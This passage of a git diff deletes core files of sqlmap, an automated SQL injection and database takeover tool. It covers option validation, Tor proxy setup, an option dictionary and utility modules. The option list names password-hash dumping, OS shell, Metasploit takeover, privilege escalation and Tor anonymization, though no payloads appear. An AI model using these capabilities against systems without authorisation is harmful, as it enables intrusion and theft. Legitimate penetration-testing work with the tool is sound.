"successfully use switch '--tor' " - - raise SqlmapConnectionException(errMsg) - - if not conf.checkTor: - warnMsg = "use switch '--check-tor' at " - warnMsg += "your own convenience when accessing " - warnMsg += "Tor anonymizing network because of " - warnMsg += "known issues with default settings of various 'bundles' " - warnMsg += "(e.g. 
Vidalia)" - logger.warn(warnMsg) - -def _setTorSocksProxySettings(): - infoMsg = "setting Tor SOCKS proxy settings" - logger.info(infoMsg) - - # Has to be SOCKS5 to prevent DNS leaks (http://en.wikipedia.org/wiki/Tor_%28anonymity_network%29) - socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if conf.torType == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, LOCALHOST, conf.torPort or DEFAULT_TOR_SOCKS_PORT) - socks.wrapmodule(urllib2) - -def _checkWebSocket(): - if conf.url and (conf.url.startswith("ws:/") or conf.url.startswith("wss:/")): - try: - from websocket import ABNF - except ImportError: - errMsg = "sqlmap requires third-party module 'websocket-client' " - errMsg += "in order to use WebSocket funcionality" - raise SqlmapMissingDependence(errMsg) - -def _checkTor(): - if not conf.checkTor: - return - - infoMsg = "checking Tor connection" - logger.info(infoMsg) - - try: - page, _, _ = Request.getPage(url="https://check.torproject.org/", raise404=False) - except SqlmapConnectionException: - page = None - - if not page or 'Congratulations' not in page: - errMsg = "it seems that Tor is not properly set. 
Please try using options '--tor-type' and/or '--tor-port'" - raise SqlmapConnectionException(errMsg) - else: - infoMsg = "Tor is properly being used" - logger.info(infoMsg) - -def _basicOptionValidation(): - if conf.limitStart is not None and not (isinstance(conf.limitStart, int) and conf.limitStart > 0): - errMsg = "value for option '--start' (limitStart) must be an integer value greater than zero (>0)" - raise SqlmapSyntaxException(errMsg) - - if conf.limitStop is not None and not (isinstance(conf.limitStop, int) and conf.limitStop > 0): - errMsg = "value for option '--stop' (limitStop) must be an integer value greater than zero (>0)" - raise SqlmapSyntaxException(errMsg) - - if conf.level is not None and not (isinstance(conf.level, int) and conf.level >= 1 and conf.level <= 5): - errMsg = "value for option '--level' must be an integer value from range [1, 5]" - raise SqlmapSyntaxException(errMsg) - - if conf.risk is not None and not (isinstance(conf.risk, int) and conf.risk >= 1 and conf.risk <= 3): - errMsg = "value for option '--risk' must be an integer value from range [1, 3]" - raise SqlmapSyntaxException(errMsg) - - if isinstance(conf.limitStart, int) and conf.limitStart > 0 and \ - isinstance(conf.limitStop, int) and conf.limitStop < conf.limitStart: - errMsg = "value for option '--start' (limitStart) must be smaller or equal than value for --stop (limitStop) option" - raise SqlmapSyntaxException(errMsg) - - if isinstance(conf.firstChar, int) and conf.firstChar > 0 and \ - isinstance(conf.lastChar, int) and conf.lastChar < conf.firstChar: - errMsg = "value for option '--first' (firstChar) must be smaller than or equal to value for --last (lastChar) option" - raise SqlmapSyntaxException(errMsg) - - if isinstance(conf.cpuThrottle, int) and (conf.cpuThrottle > 100 or conf.cpuThrottle < 0): - errMsg = "value for option '--cpu-throttle' (cpuThrottle) must be in range [0,100]" - raise SqlmapSyntaxException(errMsg) - - if conf.textOnly and conf.nullConnection: - 
errMsg = "switch '--text-only' is incompatible with switch '--null-connection'" - raise SqlmapSyntaxException(errMsg) - - if conf.direct and conf.url: - errMsg = "option '-d' is incompatible with option '-u' ('--url')" - raise SqlmapSyntaxException(errMsg) - - if conf.identifyWaf and conf.skipWaf: - errMsg = "switch '--identify-waf' is incompatible with switch '--skip-waf'" - raise SqlmapSyntaxException(errMsg) - - if conf.titles and conf.nullConnection: - errMsg = "switch '--titles' is incompatible with switch '--null-connection'" - raise SqlmapSyntaxException(errMsg) - - if conf.dumpTable and conf.search: - errMsg = "switch '--dump' is incompatible with switch '--search'" - raise SqlmapSyntaxException(errMsg) - - if conf.data and conf.nullConnection: - errMsg = "option '--data' is incompatible with switch '--null-connection'" - raise SqlmapSyntaxException(errMsg) - - if conf.string and conf.nullConnection: - errMsg = "option '--string' is incompatible with switch '--null-connection'" - raise SqlmapSyntaxException(errMsg) - - if conf.notString and conf.nullConnection: - errMsg = "option '--not-string' is incompatible with switch '--null-connection'" - raise SqlmapSyntaxException(errMsg) - - if conf.noCast and conf.hexConvert: - errMsg = "switch '--no-cast' is incompatible with switch '--hex'" - raise SqlmapSyntaxException(errMsg) - - if conf.dumpAll and conf.search: - errMsg = "switch '--dump-all' is incompatible with switch '--search'" - raise SqlmapSyntaxException(errMsg) - - if conf.string and conf.notString: - errMsg = "option '--string' is incompatible with switch '--not-string'" - raise SqlmapSyntaxException(errMsg) - - if conf.regexp and conf.nullConnection: - errMsg = "option '--regexp' is incompatible with switch '--null-connection'" - raise SqlmapSyntaxException(errMsg) - - if conf.regexp: - try: - re.compile(conf.regexp) - except re.error, ex: - errMsg = "invalid regular expression '%s' ('%s')" % (conf.regexp, getSafeExString(ex)) - raise 
SqlmapSyntaxException(errMsg) - - if conf.crawlExclude: - try: - re.compile(conf.crawlExclude) - except re.error, ex: - errMsg = "invalid regular expression '%s' ('%s')" % (conf.crawlExclude, getSafeExString(ex)) - raise SqlmapSyntaxException(errMsg) - - if conf.dumpTable and conf.dumpAll: - errMsg = "switch '--dump' is incompatible with switch '--dump-all'" - raise SqlmapSyntaxException(errMsg) - - if conf.predictOutput and (conf.threads > 1 or conf.optimize): - errMsg = "switch '--predict-output' is incompatible with option '--threads' and switch '-o'" - raise SqlmapSyntaxException(errMsg) - - if conf.threads > MAX_NUMBER_OF_THREADS and not conf.get("skipThreadCheck"): - errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS - raise SqlmapSyntaxException(errMsg) - - if conf.forms and not any((conf.url, conf.googleDork, conf.bulkFile, conf.sitemapUrl)): - errMsg = "switch '--forms' requires usage of option '-u' ('--url'), '-g', '-m' or '-x'" - raise SqlmapSyntaxException(errMsg) - - if conf.crawlExclude and not conf.crawlDepth: - errMsg = "option '--crawl-exclude' requires usage of switch '--crawl'" - raise SqlmapSyntaxException(errMsg) - - if conf.safePost and not conf.safeUrl: - errMsg = "option '--safe-post' requires usage of option '--safe-url'" - raise SqlmapSyntaxException(errMsg) - - if conf.safeFreq and not any((conf.safeUrl, conf.safeReqFile)): - errMsg = "option '--safe-freq' requires usage of option '--safe-url' or '--safe-req'" - raise SqlmapSyntaxException(errMsg) - - if conf.safeReqFile and any((conf.safeUrl, conf.safePost)): - errMsg = "option '--safe-req' is incompatible with option '--safe-url' and option '--safe-post'" - raise SqlmapSyntaxException(errMsg) - - if conf.csrfUrl and not conf.csrfToken: - errMsg = "option '--csrf-url' requires usage of option '--csrf-token'" - raise SqlmapSyntaxException(errMsg) - - if conf.csrfToken and conf.threads > 1: - errMsg = "option '--csrf-url' is 
incompatible with option '--threads'" - raise SqlmapSyntaxException(errMsg) - - if conf.requestFile and conf.url and conf.url != DUMMY_URL: - errMsg = "option '-r' is incompatible with option '-u' ('--url')" - raise SqlmapSyntaxException(errMsg) - - if conf.direct and conf.proxy: - errMsg = "option '-d' is incompatible with option '--proxy'" - raise SqlmapSyntaxException(errMsg) - - if conf.direct and conf.tor: - errMsg = "option '-d' is incompatible with switch '--tor'" - raise SqlmapSyntaxException(errMsg) - - if not conf.tech: - errMsg = "option '--technique' can't be empty" - raise SqlmapSyntaxException(errMsg) - - if conf.tor and conf.ignoreProxy: - errMsg = "switch '--tor' is incompatible with switch '--ignore-proxy'" - raise SqlmapSyntaxException(errMsg) - - if conf.tor and conf.proxy: - errMsg = "switch '--tor' is incompatible with option '--proxy'" - raise SqlmapSyntaxException(errMsg) - - if conf.proxy and conf.proxyFile: - errMsg = "switch '--proxy' is incompatible with option '--proxy-file'" - raise SqlmapSyntaxException(errMsg) - - if conf.checkTor and not any((conf.tor, conf.proxy)): - errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address using Tor)" - raise SqlmapSyntaxException(errMsg) - - if conf.torPort is not None and not (isinstance(conf.torPort, int) and conf.torPort >= 0 and conf.torPort <= 65535): - errMsg = "value for option '--tor-port' must be in range 0-65535" - raise SqlmapSyntaxException(errMsg) - - if conf.torType not in getPublicTypeMembers(PROXY_TYPE, True): - errMsg = "option '--tor-type' accepts one of following values: %s" % ", ".join(getPublicTypeMembers(PROXY_TYPE, True)) - raise SqlmapSyntaxException(errMsg) - - if conf.dumpFormat not in getPublicTypeMembers(DUMP_FORMAT, True): - errMsg = "option '--dump-format' accepts one of following values: %s" % ", ".join(getPublicTypeMembers(DUMP_FORMAT, True)) - raise SqlmapSyntaxException(errMsg) - - if conf.skip and 
conf.testParameter: - errMsg = "option '--skip' is incompatible with option '-p'" - raise SqlmapSyntaxException(errMsg) - - if conf.mobile and conf.agent: - errMsg = "switch '--mobile' is incompatible with option '--user-agent'" - raise SqlmapSyntaxException(errMsg) - - if conf.proxy and conf.ignoreProxy: - errMsg = "option '--proxy' is incompatible with switch '--ignore-proxy'" - raise SqlmapSyntaxException(errMsg) - - if conf.timeSec < 1: - errMsg = "value for option '--time-sec' must be a positive integer" - raise SqlmapSyntaxException(errMsg) - - if conf.uChar and not re.match(UNION_CHAR_REGEX, conf.uChar): - errMsg = "value for option '--union-char' must be an alpha-numeric value (e.g. 1)" - raise SqlmapSyntaxException(errMsg) - - if isinstance(conf.uCols, basestring): - if not conf.uCols.isdigit() and ("-" not in conf.uCols or len(conf.uCols.split("-")) != 2): - errMsg = "value for option '--union-cols' must be a range with hyphon " - errMsg += "(e.g. 1-10) or integer value (e.g. 5)" - raise SqlmapSyntaxException(errMsg) - - if conf.dbmsCred and ':' not in conf.dbmsCred: - errMsg = "value for option '--dbms-cred' must be in " - errMsg += "format : (e.g. \"root:pass\")" - raise SqlmapSyntaxException(errMsg) - - if conf.charset: - _ = checkCharEncoding(conf.charset, False) - if _ is None: - errMsg = "unknown charset '%s'. 
Please visit " % conf.charset - errMsg += "'%s' to get the full list of " % CODECS_LIST_PAGE - errMsg += "supported charsets" - raise SqlmapSyntaxException(errMsg) - else: - conf.charset = _ - - if conf.loadCookies: - if not os.path.exists(conf.loadCookies): - errMsg = "cookies file '%s' does not exist" % conf.loadCookies - raise SqlmapFilePathException(errMsg) - -def _resolveCrossReferences(): - lib.core.threads.readInput = readInput - lib.core.common.getPageTemplate = getPageTemplate - lib.core.convert.singleTimeWarnMessage = singleTimeWarnMessage - lib.request.connect.setHTTPHandlers = _setHTTPHandlers - lib.utils.search.setHTTPHandlers = _setHTTPHandlers - lib.controller.checks.setVerbosity = setVerbosity - -def initOptions(inputOptions=AttribDict(), overrideOptions=False): - if IS_WIN: - coloramainit() - - _setConfAttributes() - _setKnowledgeBaseAttributes() - _mergeOptions(inputOptions, overrideOptions) - -def init(): - """ - Set attributes into both configuration and knowledge base singletons - based upon command line and configuration file options. 
- """ - - _useWizardInterface() - setVerbosity() - _saveConfig() - _setRequestFromFile() - _cleanupOptions() - _dirtyPatches() - _purgeOutput() - _checkDependencies() - _createTemporaryDirectory() - _basicOptionValidation() - _setProxyList() - _setTorProxySettings() - _setDNSServer() - _adjustLoggingFormatter() - _setMultipleTargets() - _setTamperingFunctions() - _setWafFunctions() - _setTrafficOutputFP() - _resolveCrossReferences() - _checkWebSocket() - - parseTargetUrl() - parseTargetDirect() - - if any((conf.url, conf.logFile, conf.bulkFile, conf.sitemapUrl, conf.requestFile, conf.googleDork, conf.liveTest)): - _setHTTPTimeout() - _setHTTPExtraHeaders() - _setHTTPCookies() - _setHTTPReferer() - _setHTTPHost() - _setHTTPUserAgent() - _setHTTPAuthentication() - _setHTTPHandlers() - _setDNSCache() - _setSocketPreConnect() - _setSafeVisit() - _doSearch() - _setBulkMultipleTargets() - _setSitemapTargets() - _checkTor() - _setCrawler() - _findPageForms() - _setDBMS() - _setTechnique() - - _setThreads() - _setOS() - _setWriteFile() - _setMetasploit() - _setDBMSAuthentication() - loadBoundaries() - loadPayloads() - _setPrefixSuffix() - update() - _loadQueries() diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py deleted file mode 100644 index dd08bd74..00000000 --- a/lib/core/optiondict.py +++ /dev/null @@ -1,243 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -optDict = { - # Format: - # Family: { "parameter name": "parameter datatype" }, - # Or: - # Family: { "parameter name": ("parameter datatype", "category name used for common outputs feature") }, - "Target": { - "direct": "string", - "url": "string", - "logFile": "string", - "bulkFile": "string", - "requestFile": "string", - "sessionFile": "string", - "googleDork": "string", - "configFile": "string", - "sitemapUrl": "string", - }, - - "Request": { - "method": "string", - "data": "string", - 
"paramDel": "string", - "cookie": "string", - "cookieDel": "string", - "loadCookies": "string", - "dropSetCookie": "boolean", - "agent": "string", - "randomAgent": "boolean", - "host": "string", - "referer": "string", - "headers": "string", - "authType": "string", - "authCred": "string", - "authFile": "string", - "proxy": "string", - "proxyCred": "string", - "proxyFile": "string", - "ignoreProxy": "boolean", - "tor": "boolean", - "torPort": "integer", - "torType": "string", - "checkTor": "boolean", - "delay": "float", - "timeout": "float", - "retries": "integer", - "rParam": "string", - "safeUrl": "string", - "safePost": "string", - "safeReqFile": "string", - "safeFreq": "integer", - "skipUrlEncode": "boolean", - "csrfToken": "string", - "csrfUrl": "string", - "forceSSL": "boolean", - "hpp": "boolean", - "evalCode": "string", - }, - - "Optimization": { - "optimize": "boolean", - "predictOutput": "boolean", - "keepAlive": "boolean", - "nullConnection": "boolean", - "threads": "integer", - }, - - "Injection": { - "testParameter": "string", - "skip": "string", - "skipStatic": "boolean", - "dbms": "string", - "dbmsCred": "string", - "os": "string", - "invalidBignum": "boolean", - "invalidLogical": "boolean", - "invalidString": "boolean", - "noCast": "boolean", - "noEscape": "boolean", - "prefix": "string", - "suffix": "string", - "tamper": "string", - }, - - "Detection": { - "level": "integer", - "risk": "integer", - "string": "string", - "notString": "string", - "regexp": "string", - "code": "integer", - "textOnly": "boolean", - "titles": "boolean", - }, - - "Techniques": { - "tech": "string", - "timeSec": "integer", - "uCols": "string", - "uChar": "string", - "uFrom": "string", - "dnsName": "string", - "secondOrder": "string", - }, - - "Fingerprint": { - "extensiveFp": "boolean", - }, - - "Enumeration": { - "getAll": "boolean", - "getBanner": ("boolean", "Banners"), - "getCurrentUser": ("boolean", "Users"), - "getCurrentDb": ("boolean", "Databases"), - "getHostname": 
"boolean", - "isDba": "boolean", - "getUsers": ("boolean", "Users"), - "getPasswordHashes": ("boolean", "Passwords"), - "getPrivileges": ("boolean", "Privileges"), - "getRoles": ("boolean", "Roles"), - "getDbs": ("boolean", "Databases"), - "getTables": ("boolean", "Tables"), - "getColumns": ("boolean", "Columns"), - "getSchema": "boolean", - "getCount": "boolean", - "dumpTable": "boolean", - "dumpAll": "boolean", - "search": "boolean", - "getComments": "boolean", - "db": "string", - "tbl": "string", - "col": "string", - "excludeCol": "string", - "dumpWhere": "string", - "user": "string", - "excludeSysDbs": "boolean", - "limitStart": "integer", - "limitStop": "integer", - "firstChar": "integer", - "lastChar": "integer", - "query": "string", - "sqlShell": "boolean", - "sqlFile": "string", - }, - - "Brute": { - "commonTables": "boolean", - "commonColumns": "boolean", - }, - - "User-defined function": { - "udfInject": "boolean", - "shLib": "string", - }, - - "File system": { - "rFile": "string", - "wFile": "string", - "dFile": "string", - }, - - "Takeover": { - "osCmd": "string", - "osShell": "boolean", - "osPwn": "boolean", - "osSmb": "boolean", - "osBof": "boolean", - "privEsc": "boolean", - "msfPath": "string", - "tmpPath": "string", - }, - - "Windows": { - "regRead": "boolean", - "regAdd": "boolean", - "regDel": "boolean", - "regKey": "string", - "regVal": "string", - "regData": "string", - "regType": "string", - }, - - "General": { - #"xmlFile": "string", - "trafficFile": "string", - "batch": "boolean", - "charset": "string", - "crawlDepth": "integer", - "crawlExclude": "string", - "csvDel": "string", - "dumpFormat": "string", - "eta": "boolean", - "flushSession": "boolean", - "forms": "boolean", - "freshQueries": "boolean", - "hexConvert": "boolean", - "outputDir": "string", - "parseErrors": "boolean", - "pivotColumn": "string", - "saveConfig": "string", - "scope": "string", - "testFilter": "string", - "testSkip": "string", - "updateAll": "boolean", - }, - - 
"Miscellaneous": { - "alert": "string", - "answers": "string", - "beep": "boolean", - "cleanup": "boolean", - "dependencies": "boolean", - "disableColoring": "boolean", - "googlePage": "integer", - "mobile": "boolean", - "offline": "boolean", - "pageRank": "boolean", - "purgeOutput": "boolean", - "smart": "boolean", - "wizard": "boolean", - "verbose": "integer", - }, - "Hidden": { - "dummy": "boolean", - "disablePrecon": "boolean", - "binaryFields": "string", - "profile": "boolean", - "cpuThrottle": "integer", - "forceDns": "boolean", - "identifyWaf": "boolean", - "skipWaf": "boolean", - "ignore401": "boolean", - "smokeTest": "boolean", - "liveTest": "boolean", - "stopFail": "boolean", - "runCase": "string", - } - } diff --git a/lib/core/profiling.py b/lib/core/profiling.py deleted file mode 100644 index a748d1ba..00000000 --- a/lib/core/profiling.py +++ /dev/null @@ -1,89 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import codecs -import os -import cProfile - -from lib.core.common import getUnicode -from lib.core.data import logger -from lib.core.data import paths -from lib.core.settings import UNICODE_ENCODING - -def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None): - """ - This will run the program and present profiling data in a nice looking graph - """ - - try: - from thirdparty.gprof2dot import gprof2dot - from thirdparty.xdot import xdot - import gobject - import gtk - import pydot - except ImportError, e: - errMsg = "profiling requires third-party libraries ('%s') " % getUnicode(e, UNICODE_ENCODING) - errMsg += "(Hint: 'sudo apt-get install python-pydot python-pyparsing python-profiler graphviz')" - logger.error(errMsg) - - return - - if profileOutputFile is None: - profileOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, "sqlmap_profile.raw") - - if dotOutputFile is None: - dotOutputFile = 
os.path.join(paths.SQLMAP_OUTPUT_PATH, "sqlmap_profile.dot") - - if imageOutputFile is None: - imageOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, "sqlmap_profile.png") - - if os.path.exists(profileOutputFile): - os.remove(profileOutputFile) - - if os.path.exists(dotOutputFile): - os.remove(dotOutputFile) - - if os.path.exists(imageOutputFile): - os.remove(imageOutputFile) - - infoMsg = "profiling the execution into file %s" % profileOutputFile - logger.info(infoMsg) - - # Start sqlmap main function and generate a raw profile file - cProfile.run("start()", profileOutputFile) - - infoMsg = "converting profile data into a dot file '%s'" % dotOutputFile - logger.info(infoMsg) - - # Create dot file by using extra/gprof2dot/gprof2dot.py - # http://code.google.com/p/jrfonseca/wiki/Gprof2Dot - dotFilePointer = codecs.open(dotOutputFile, 'wt', UNICODE_ENCODING) - parser = gprof2dot.PstatsParser(profileOutputFile) - profile = parser.parse() - profile.prune(0.5 / 100.0, 0.1 / 100.0) - dot = gprof2dot.DotWriter(dotFilePointer) - dot.graph(profile, gprof2dot.TEMPERATURE_COLORMAP) - dotFilePointer.close() - - infoMsg = "converting dot file into a graph image '%s'" % imageOutputFile - logger.info(infoMsg) - - # Create graph image (png) by using pydot (python-pydot) - # http://code.google.com/p/pydot/ - pydotGraph = pydot.graph_from_dot_file(dotOutputFile) - pydotGraph.write_png(imageOutputFile) - - infoMsg = "displaying interactive graph with xdot library" - logger.info(infoMsg) - - # Display interactive Graphviz dot file by using extra/xdot/xdot.py - # http://code.google.com/p/jrfonseca/wiki/XDot - win = xdot.DotWindow() - win.connect('destroy', gtk.main_quit) - win.set_filter("dot") - win.open_file(dotOutputFile) - gtk.main() diff --git a/lib/core/readlineng.py b/lib/core/readlineng.py deleted file mode 100644 index fe52ee1c..00000000 --- a/lib/core/readlineng.py +++ /dev/null @@ -1,65 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers 
(http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.data import logger -from lib.core.settings import IS_WIN -from lib.core.settings import PLATFORM - -_readline = None - -try: - from readline import * - import readline as _readline -except ImportError: - try: - from pyreadline import * - import pyreadline as _readline - except ImportError: - pass - -if IS_WIN and _readline: - try: - _outputfile = _readline.GetOutputFile() - except AttributeError: - debugMsg = "Failed GetOutputFile when using platform's " - debugMsg += "readline library" - logger.debug(debugMsg) - - _readline = None - -# Test to see if libedit is being used instead of GNU readline. -# Thanks to Boyd Waters for this patch. -uses_libedit = False - -if PLATFORM == 'mac' and _readline: - import commands - - (status, result) = commands.getstatusoutput("otool -L %s | grep libedit" % _readline.__file__) - - if status == 0 and len(result) > 0: - # We are bound to libedit - new in Leopard - _readline.parse_and_bind("bind ^I rl_complete") - - debugMsg = "Leopard libedit detected when using platform's " - debugMsg += "readline library" - logger.debug(debugMsg) - - uses_libedit = True - -# the clear_history() function was only introduced in Python 2.4 and is -# actually optional in the readline API, so we must explicitly check for its -# existence. Some known platforms actually don't have it. This thread: -# http://mail.python.org/pipermail/python-dev/2003-August/037845.html -# has the original discussion. 
-if _readline: - try: - _readline.clear_history() - except AttributeError: - def clear_history(): - pass - - _readline.clear_history = clear_history diff --git a/lib/core/replication.py b/lib/core/replication.py deleted file mode 100644 index 92c591aa..00000000 --- a/lib/core/replication.py +++ /dev/null @@ -1,119 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import sqlite3 - -from extra.safe2bin.safe2bin import safechardecode -from lib.core.common import getSafeExString -from lib.core.common import unsafeSQLIdentificatorNaming -from lib.core.exception import SqlmapGenericException -from lib.core.exception import SqlmapValueException -from lib.core.settings import UNICODE_ENCODING - -class Replication(object): - """ - This class holds all methods/classes used for database - replication purposes. - """ - - def __init__(self, dbpath): - self.dbpath = dbpath - self.connection = sqlite3.connect(dbpath) - self.connection.isolation_level = None - self.cursor = self.connection.cursor() - - class DataType: - """ - Using this class we define auxiliary objects - used for representing sqlite data types. - """ - - def __init__(self, name): - self.name = name - - def __str__(self): - return self.name - - def __repr__(self): - return "" % self - - class Table: - """ - This class defines methods used to manipulate table objects. 
- """ - - def __init__(self, parent, name, columns=None, create=True, typeless=False): - self.parent = parent - self.name = unsafeSQLIdentificatorNaming(name) - self.columns = columns - if create: - try: - self.execute('DROP TABLE IF EXISTS "%s"' % self.name) - if not typeless: - self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s" %s' % (unsafeSQLIdentificatorNaming(colname), coltype) for colname, coltype in self.columns))) - else: - self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s"' % unsafeSQLIdentificatorNaming(colname) for colname in self.columns))) - except Exception, ex: - errMsg = "problem occurred ('%s') while initializing the sqlite database " % getSafeExString(ex, UNICODE_ENCODING) - errMsg += "located at '%s'" % self.parent.dbpath - raise SqlmapGenericException(errMsg) - - def insert(self, values): - """ - This function is used for inserting row(s) into current table. - """ - - if len(values) == len(self.columns): - self.execute('INSERT INTO "%s" VALUES (%s)' % (self.name, ','.join(['?'] * len(values))), safechardecode(values)) - else: - errMsg = "wrong number of columns used in replicating insert" - raise SqlmapValueException(errMsg) - - def execute(self, sql, parameters=[]): - try: - self.parent.cursor.execute(sql, parameters) - except sqlite3.OperationalError, ex: - errMsg = "problem occurred ('%s') while accessing sqlite database " % getSafeExString(ex, UNICODE_ENCODING) - errMsg += "located at '%s'. Please make sure that " % self.parent.dbpath - errMsg += "it's not used by some other program" - raise SqlmapGenericException(errMsg) - - def beginTransaction(self): - """ - Great speed improvement can be gained by using explicit transactions around multiple inserts. 
- Reference: http://stackoverflow.com/questions/4719836/python-and-sqlite3-adding-thousands-of-rows - """ - self.execute('BEGIN TRANSACTION') - - def endTransaction(self): - self.execute('END TRANSACTION') - - def select(self, condition=None): - """ - This function is used for selecting row(s) from current table. - """ - _ = 'SELECT * FROM %s' % self.name - if condition: - _ += 'WHERE %s' % condition - return self.execute(_) - - def createTable(self, tblname, columns=None, typeless=False): - """ - This function creates Table instance with current connection settings. - """ - return Replication.Table(parent=self, name=tblname, columns=columns, typeless=typeless) - - def __del__(self): - self.cursor.close() - self.connection.close() - - # sqlite data types - NULL = DataType('NULL') - INTEGER = DataType('INTEGER') - REAL = DataType('REAL') - TEXT = DataType('TEXT') - BLOB = DataType('BLOB') diff --git a/lib/core/revision.py b/lib/core/revision.py deleted file mode 100644 index 9f53f4bd..00000000 --- a/lib/core/revision.py +++ /dev/null @@ -1,54 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import re - -from subprocess import PIPE -from subprocess import Popen as execute - -def getRevisionNumber(): - """ - Returns abbreviated commit hash number as retrieved with "git rev-parse --short HEAD" - """ - - retVal = None - filePath = None - _ = os.path.dirname(__file__) - - while True: - filePath = os.path.join(_, ".git", "HEAD") - if os.path.exists(filePath): - break - else: - filePath = None - if _ == os.path.dirname(_): - break - else: - _ = os.path.dirname(_) - - while True: - if filePath and os.path.isfile(filePath): - with open(filePath, "r") as f: - content = f.read() - filePath = None - if content.startswith("ref: "): - filePath = os.path.join(_, ".git", content.replace("ref: ", "")).strip() - else: - match = re.match(r"(?i)[0-9a-f]{32}", 
content) - retVal = match.group(0) if match else None - break - else: - break - - if not retVal: - process = execute("git rev-parse --verify HEAD", shell=True, stdout=PIPE, stderr=PIPE) - stdout, _ = process.communicate() - match = re.search(r"(?i)[0-9a-f]{32}", stdout or "") - retVal = match.group(0) if match else None - - return retVal[:7] if retVal else None diff --git a/lib/core/session.py b/lib/core/session.py deleted file mode 100644 index 799342bc..00000000 --- a/lib/core/session.py +++ /dev/null @@ -1,77 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.common import Backend -from lib.core.common import Format -from lib.core.common import hashDBWrite -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import HASHDB_KEYS -from lib.core.enums import OS -from lib.core.settings import SUPPORTED_DBMS - -def setDbms(dbms): - """ - @param dbms: database management system to be set into the knowledge - base as fingerprint. 
- @type dbms: C{str} - """ - - hashDBWrite(HASHDB_KEYS.DBMS, dbms) - - _ = "(%s)" % ("|".join([alias for alias in SUPPORTED_DBMS])) - _ = re.search(r"\A%s( |\Z)" % _, dbms, re.I) - - if _: - dbms = _.group(1) - - Backend.setDbms(dbms) - - logger.info("the back-end DBMS is %s" % Backend.getDbms()) - -def setOs(): - """ - Example of kb.bannerFp dictionary: - - { - 'sp': set(['Service Pack 4']), - 'dbmsVersion': '8.00.194', - 'dbmsServicePack': '0', - 'distrib': set(['2000']), - 'dbmsRelease': '2000', - 'type': set(['Windows']) - } - """ - - infoMsg = "" - - if not kb.bannerFp: - return - - if "type" in kb.bannerFp: - Backend.setOs(Format.humanize(kb.bannerFp["type"])) - infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs() - - if "distrib" in kb.bannerFp: - kb.osVersion = Format.humanize(kb.bannerFp["distrib"]) - infoMsg += " %s" % kb.osVersion - - if "sp" in kb.bannerFp: - kb.osSP = int(Format.humanize(kb.bannerFp["sp"]).replace("Service Pack ", "")) - - elif "sp" not in kb.bannerFp and Backend.isOs(OS.WINDOWS): - kb.osSP = 0 - - if Backend.getOs() and kb.osVersion and kb.osSP: - infoMsg += " Service Pack %d" % kb.osSP - - if infoMsg: - logger.info(infoMsg) - - hashDBWrite(HASHDB_KEYS.OS, Backend.getOs()) diff --git a/lib/core/settings.py b/lib/core/settings.py deleted file mode 100644 index 69ca1460..00000000 --- a/lib/core/settings.py +++ /dev/null @@ -1,714 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import re -import subprocess -import string -import sys -import time -import types - -from lib.core.datatype import AttribDict -from lib.core.enums import DBMS -from lib.core.enums import DBMS_DIRECTORY_NAME -from lib.core.enums import OS -from lib.core.revision import getRevisionNumber - -# sqlmap version and site -VERSION = "1.0.0.21" -REVISION = getRevisionNumber() -STABLE = VERSION.count('.') <= 2 -VERSION_STRING = 
"sqlmap/%s#%s" % (VERSION, "stable" if STABLE else "dev") -DESCRIPTION = "automatic SQL injection and database takeover tool" -SITE = "http://sqlmap.org" -ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new" -GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git" -GIT_PAGE = "https://github.com/sqlmapproject/sqlmap" - -# colorful banner -BANNER = """\033[01;33m _ - ___ ___| |_____ ___ ___ \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m -|_ -| . | | | .'| . | -|___|_ |_|_|_|_|__,| _| - |_| |_| \033[0m\033[4;37m%s\033[0m\n -""" % ((31 + hash(VERSION) % 6) if not STABLE else 30, VERSION_STRING.split('/')[-1], SITE) - -# Minimum distance of ratio from kb.matchRatio to result in True -DIFF_TOLERANCE = 0.05 -CONSTANT_RATIO = 0.9 - -# Ratio used in heuristic check for WAF/IDS/IPS protected targets -IDS_WAF_CHECK_RATIO = 0.5 - -# Timeout used in heuristic check for WAF/IDS/IPS protected targets -IDS_WAF_CHECK_TIMEOUT = 10 - -# Lower and upper values for match ratio in case of stable page -LOWER_RATIO_BOUND = 0.02 -UPPER_RATIO_BOUND = 0.98 - -# Markers for special cases when parameter values contain html encoded characters -PARAMETER_AMP_MARKER = "__AMP__" -PARAMETER_SEMICOLON_MARKER = "__SEMICOLON__" -BOUNDARY_BACKSLASH_MARKER = "__BACKSLASH__" -PARTIAL_VALUE_MARKER = "__PARTIAL_VALUE__" -PARTIAL_HEX_VALUE_MARKER = 